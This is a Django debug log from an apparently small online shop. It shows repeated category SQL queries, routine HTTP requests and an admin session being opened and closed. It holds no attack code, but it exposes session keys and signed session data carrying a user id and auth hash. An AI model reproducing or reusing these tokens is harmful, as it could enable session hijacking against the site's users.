2019-12-20 10:17:48,392 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 10:17:48,396 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 10:17:48,400 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 10:17:48,404 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 10:17:48,410 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 10:17:48,414 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 10:17:48,418 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 10:17:48,422 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 10:17:48,426 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 10:17:48,432 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 10:17:48,436 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 10:17:48,440 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 10:17:48,444 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 10:17:48,449 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 10:17:48,455 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 10:17:48,459 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 10:17:48,463 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 10:17:48,466 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 10:17:48,471 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 10:17:48,474 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 10:17:48,480 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 10:17:48,484 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 10:17:48,488 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 10:17:48,492 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 10:17:48,496 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 10:17:48,502 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 10:17:48,506 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 10:17:48,510 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 10:17:48,514 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 10:17:48,518 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 10:17:48,524 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 10:17:48,528 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 10:17:48,532 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 10:17:48,536 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 10:17:48,540 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 10:17:48,544 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 10:17:48,549 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 10:17:48,553 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 10:17:48,557 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 10:17:48,562 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 10:17:48,566 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 10:17:48] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [20/Dec/2019 10:18:38] "GET / HTTP/1.0" 302 0 [20/Dec/2019 10:23:41] "GET / HTTP/1.0" 302 0 [20/Dec/2019 10:30:01] "GET / HTTP/1.0" 302 0 [20/Dec/2019 10:35:14] "GET / HTTP/1.0" 302 0 [20/Dec/2019 10:40:30] "GET / HTTP/1.0" 302 0 [20/Dec/2019 10:41:37] "GET / HTTP/1.0" 302 0 [20/Dec/2019 10:45:39] "GET / HTTP/1.0" 302 0 [20/Dec/2019 10:55:04] "GET / HTTP/1.0" 302 0 [20/Dec/2019 11:00:01] "GET /whm-server-status HTTP/1.0" 301 0 [20/Dec/2019 11:05:03] "GET / HTTP/1.0" 302 0 [20/Dec/2019 11:10:05] "GET / HTTP/1.0" 302 0 [20/Dec/2019 11:17:09] "GET / HTTP/1.0" 302 0 [20/Dec/2019 11:22:12] "GET / HTTP/1.0" 302 0 [20/Dec/2019 11:27:15] "GET / HTTP/1.0" 302 0 [20/Dec/2019 11:30:18] "GET / HTTP/1.0" 302 0 [20/Dec/2019 11:32:18] "GET / HTTP/1.0" 302 0 [20/Dec/2019 11:37:21] "GET / HTTP/1.0" 302 0 [20/Dec/2019 11:42:23] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [20/Dec/2019 11:45:53] "GET /robots.txt HTTP/1.0" 404 6451 Not Found: /ads.txt [20/Dec/2019 11:45:53] "GET /ads.txt HTTP/1.0" 404 6442 DEBUG 2019-12-20 11:49:02,630 utils 4252 140031503103744 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-20T11:49:02.620540+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 20, 11, 49, 2, 620540, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-20 11:49:02,637 utils 4252 140031503103744 (0.003) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) Not Found: /robots.txt [20/Dec/2019 11:49:02] "GET /robots.txt HTTP/1.0" 404 6453 DEBUG 2019-12-20 11:49:02,691 utils 4252 140031503103744 (0.006) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-20 11:49:02,702 utils 4252 140031503103744 (0.003) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2020-01-03T11:49:02.698684+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2020, 1, 3, 11, 49, 2, 698684, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [20/Dec/2019 11:49:02] "GET / HTTP/1.0" 200 8208 [20/Dec/2019 11:49:03] "GET /static/admin/css/base.css HTTP/1.0" 200 16378 [20/Dec/2019 11:49:03] "GET /static/admin/css/dashboard.css HTTP/1.0" 200 412 [20/Dec/2019 11:49:03] "GET /static/admin/css/responsive.css HTTP/1.0" 200 17944 [20/Dec/2019 11:49:03] "GET /static/admin/css/fonts.css HTTP/1.0" 200 423 [20/Dec/2019 11:49:03] "GET /static/admin/img/icon-changelink.svg HTTP/1.0" 200 380 [20/Dec/2019 11:49:03] "GET /static/admin/img/icon-addlink.svg HTTP/1.0" 200 331 [20/Dec/2019 11:49:04] "GET /static/admin/fonts/Roboto-Light-webfont.woff HTTP/1.0" 200 85692 [20/Dec/2019 11:49:04] "GET /static/admin/fonts/Roboto-Regular-webfont.woff HTTP/1.0" 200 85876 [20/Dec/2019 11:49:04] "GET /static/admin/fonts/Roboto-Bold-webfont.woff HTTP/1.0" 200 86184 Not Found: /favicon.ico [20/Dec/2019 11:49:04] "GET /favicon.ico HTTP/1.0" 404 6456 DEBUG 2019-12-20 11:49:10,005 utils 4252 140031503103744 (0.007) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-20T11:49:09.987266+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 20, 11, 49, 9, 987266, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-20 11:49:10,010 utils 4252 140031503103744 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-20 11:49:10,016 utils 4252 140031503103744 (0.001) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('8ojyyz7puuibh7rtqntt8ci0gyabthm9',) DEBUG 2019-12-20 11:49:10,020 utils 4252 140031503103744 (0.001) DELETE FROM "django_session" WHERE "django_session"."session_key" IN ('8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=('8ojyyz7puuibh7rtqntt8ci0gyabthm9',) DEBUG 2019-12-20 11:49:10,055 utils 4252 140031503103744 (0.001) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'is8o7rsilzem66a30nrz07ipjg18tbfy' LIMIT 1; args=('is8o7rsilzem66a30nrz07ipjg18tbfy',) DEBUG 2019-12-20 11:49:10,057 utils 4252 140031503103744 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('is8o7rsilzem66a30nrz07ipjg18tbfy', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-03T11:49:10.055780+00:00'::timestamptz); args=('is8o7rsilzem66a30nrz07ipjg18tbfy', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 3, 11, 49, 10, 55780, tzinfo=)) [20/Dec/2019 11:49:10] "GET /logout/ HTTP/1.0" 200 1180 DEBUG 2019-12-20 11:49:12,254 utils 4252 140031503103744 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-20T11:49:12.244875+00:00'::timestamptz AND "django_session"."session_key" = 'is8o7rsilzem66a30nrz07ipjg18tbfy'); args=(datetime.datetime(2019, 12, 20, 11, 49, 12, 244875, tzinfo=), 'is8o7rsilzem66a30nrz07ipjg18tbfy') [20/Dec/2019 11:49:12] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-20 11:49:12,557 utils 4252 140031503103744 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-20T11:49:12.541263+00:00'::timestamptz AND "django_session"."session_key" = 'is8o7rsilzem66a30nrz07ipjg18tbfy'); args=(datetime.datetime(2019, 12, 20, 11, 49, 12, 541263, tzinfo=), 'is8o7rsilzem66a30nrz07ipjg18tbfy') DEBUG 2019-12-20 11:49:12,607 utils 4252 140031503103744 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2020-01-03T11:49:12.605794+00:00'::timestamptz WHERE "django_session"."session_key" = 'is8o7rsilzem66a30nrz07ipjg18tbfy'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 3, 11, 49, 12, 605794, tzinfo=), 'is8o7rsilzem66a30nrz07ipjg18tbfy') [20/Dec/2019 11:49:12] "GET /login/?next=/ HTTP/1.0" 200 1786 [20/Dec/2019 11:49:12] "GET /static/admin/css/login.css HTTP/1.0" 200 1233 [20/Dec/2019 11:49:26] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-20 11:49:26,413 utils 4252 140031503103744 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '9d8bacgttpb8axj5ck02a94frz5n205j' LIMIT 1; args=('9d8bacgttpb8axj5ck02a94frz5n205j',) DEBUG 2019-12-20 11:49:26,417 utils 4252 140031503103744 (0.002) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('9d8bacgttpb8axj5ck02a94frz5n205j', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-03T11:49:26.414301+00:00'::timestamptz); args=('9d8bacgttpb8axj5ck02a94frz5n205j', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 3, 11, 49, 26, 414301, tzinfo=)) [20/Dec/2019 11:49:26] "GET /login/?next=/ HTTP/1.0" 200 1786 [20/Dec/2019 11:49:33] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-20 11:49:34,353 utils 4252 140031503103744 (0.006) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'yqsy1vdr0rpu57mk96sm7dmi82a6cntp' LIMIT 1; args=('yqsy1vdr0rpu57mk96sm7dmi82a6cntp',) DEBUG 2019-12-20 11:49:34,356 utils 4252 